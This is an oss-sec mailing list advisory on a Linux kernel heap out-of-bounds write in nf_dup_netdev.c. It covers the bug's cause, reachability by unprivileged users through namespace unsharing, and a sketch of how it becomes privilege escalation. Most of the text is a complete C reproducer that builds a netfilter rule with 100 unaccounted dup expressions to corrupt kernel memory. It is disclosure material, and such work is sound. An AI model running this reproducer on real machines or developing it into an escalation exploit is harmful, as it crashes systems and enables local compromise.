oss-sec mailing list archives

Linux kernel: heap out of bounds write in nf_dup_netdev.c since 5.4


From: Nick Gregory <Nick.Gregory () Sophos com>
Date: Mon, 21 Feb 2022 20:38:23 +0000

There is a heap out of bounds write in the function nft_fwd_dup_netdev_offload (nf_dup_netdev.c). This was introduced 
in 5.4-rc1 by 
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be2861dc36d77ff3778979b9c3c79ada4affa131, 
and is fixed by 
https://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git/commit/?id=b1a5983f56e371046dcf164f90bfaf704d2b89f6. I 
have created a sample LPE targeting Ubuntu 21.10 with KASLR disabled.

In nft_fwd_dup_netdev_offload, ctx->num_actions++ is used to offset into the flow->rule->action.entries array 
(nf_dup_netdev.c:67) when setting up dup or fwd flow rules on a chain with hardware offload enabled. However there is a 
mismatch between the number of times the increment is called vs. the number of allocated entries. The allocated array 
size is based on the number of nftables expressions that have expr.offload_flags&NFT_OFFLOAD_F_ACTION 
(nf_tables_offload.c:97), but only the immediate expression type has this (not dup or fwd). It's possible to manually 
create a rule with dup/fwd expressions that don't have a corresponding/preceding immediate, leading to an undersized 
entries array, and an arbitrary number of out of bounds array writes. Despite being in code dealing with hardware 
offload, this is reachable when targeting network devices that don't have offload functionality (e.g. lo) as the bug is 
triggered before the rule creation fails. Additionally, while nftables requires CAP_NET_ADMIN, we can unshare into a 
new network namespace to get this as a (normally) unprivileged user. The reproducer code below demonstrates all of 
this, and will likely immediately panic the system.

This can be turned into kernel ROP/local privilege escalation without too much difficulty, as one of the values that is 
written out of bounds is conveniently a pointer to a net_device structure. There are many opportunities for one of the 
OOB writes to land in another heap allocated structure which then misuses it (type confusion, freeing it, etc.). 
Additionally, an OOB write could be landed in a buffer returned to userland, leaking the address of the net_device 
allocation out.

Reproducer (build with gcc repro.c -o repro -lmnl -lnftnl):

#include <sys/types.h>
#include <arpa/inet.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>
#include <err.h>


int main(int argc, char **argv) {
   if (geteuid() != 0) {
       puts("re-execing with unshare");
       char *args[] = {
           "unshare",
           "-Urn",
           argv[0],
           NULL,
       };
       execvp("unshare", args);
       err(1, "unshare re-exec");
   }

   // setup table
   struct nftnl_table *table = nftnl_table_alloc();
   nftnl_table_set_str(table, NFTNL_TABLE_NAME, "x");
   nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);

   // chain
   struct nftnl_chain *chain = nftnl_chain_alloc();
   nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, "x");
   nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, "y");
   nftnl_chain_set_u32(chain, NFTNL_CHAIN_HOOKNUM, NF_NETDEV_INGRESS);
   nftnl_chain_set_u32(chain, NFTNL_CHAIN_PRIO, 10);
   nftnl_chain_set_str(chain, NFTNL_CHAIN_DEV, "lo");
   nftnl_chain_set_str(chain, NFTNL_CHAIN_TYPE, "filter");
   //nftnl_chain_set_u32(chain, NFTNL_CHAIN_FLAGS, CHAIN_F_HW_OFFLOAD); // see below

   // and rule
   struct nftnl_rule *rule = nftnl_rule_alloc();
   nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, "x");
   nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, "y");

   struct nftnl_expr *exprs[128];
   int exprid = 0;

   exprs[exprid] = nftnl_expr_alloc("meta");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_META_KEY, NFT_META_PROTOCOL);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_META_DREG, NFT_REG_1);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;

   exprs[exprid] = nftnl_expr_alloc("cmp");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_SREG, NFT_REG_1);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_OP, NFT_CMP_EQ);
   nftnl_expr_set_u16(exprs[exprid], NFTNL_EXPR_CMP_DATA, 8);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;

   exprs[exprid] = nftnl_expr_alloc("payload");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_BASE, NFT_PAYLOAD_NETWORK_HEADER);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_OFFSET, 16);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_LEN, 4);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_DREG, NFT_REG_1);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;

   exprs[exprid] = nftnl_expr_alloc("cmp");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_SREG, NFT_REG_1);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_OP, NFT_CMP_EQ);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_DATA, 0x0200007f);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;

   // this is a "normal" dup, which is accounted for (as it has an immediate)
   exprs[exprid] = nftnl_expr_alloc("immediate");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_IMM_DREG, NFT_REG_1);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_IMM_DATA, 1);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;
   exprs[exprid] = nftnl_expr_alloc("dup");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_DUP_SREG_DEV, NFT_REG_1);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;

   // these dups are out of bounds.
   for (int unaccounted_dup = 0; unaccounted_dup < 100; unaccounted_dup++) {
       exprs[exprid] = nftnl_expr_alloc("dup");
       nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_DUP_SREG_DEV, NFT_REG_1);
       nftnl_rule_add_expr(rule, exprs[exprid]);
       exprid++;
   }


   // serialize

   char buf[MNL_SOCKET_BUFFER_SIZE];

   struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
   int seq = 0;

   nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
   mnl_nlmsg_batch_next(batch);

   struct nlmsghdr *nlh;
   nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
       NFT_MSG_NEWTABLE, NFPROTO_NETDEV,
       0, seq++);
   nftnl_table_nlmsg_build_payload(nlh, table);
   mnl_nlmsg_batch_next(batch);

   nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
       NFT_MSG_NEWCHAIN, NFPROTO_NETDEV,
       NLM_F_CREATE, seq++);
   nftnl_chain_nlmsg_build_payload(nlh, chain);
   // libnftnl version i'm using doesn't have the CHAIN_F_HW_OFFLOAD stuff so manually add here
   mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(2));
   mnl_nlmsg_batch_next(batch);

   nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
       NFT_MSG_NEWRULE, NFPROTO_NETDEV,
       NLM_F_CREATE|NLM_F_APPEND, seq++);
   nftnl_rule_nlmsg_build_payload(nlh, rule);
   mnl_nlmsg_batch_next(batch);

   nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
   mnl_nlmsg_batch_next(batch);

   struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER);
   if (nl == NULL) {
       err(1, "mnl_socket_open");
   }

   if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                              mnl_nlmsg_batch_size(batch)) < 0) {
       err(1, "mnl_socket_send");
   }

   return 0;
}

Current thread: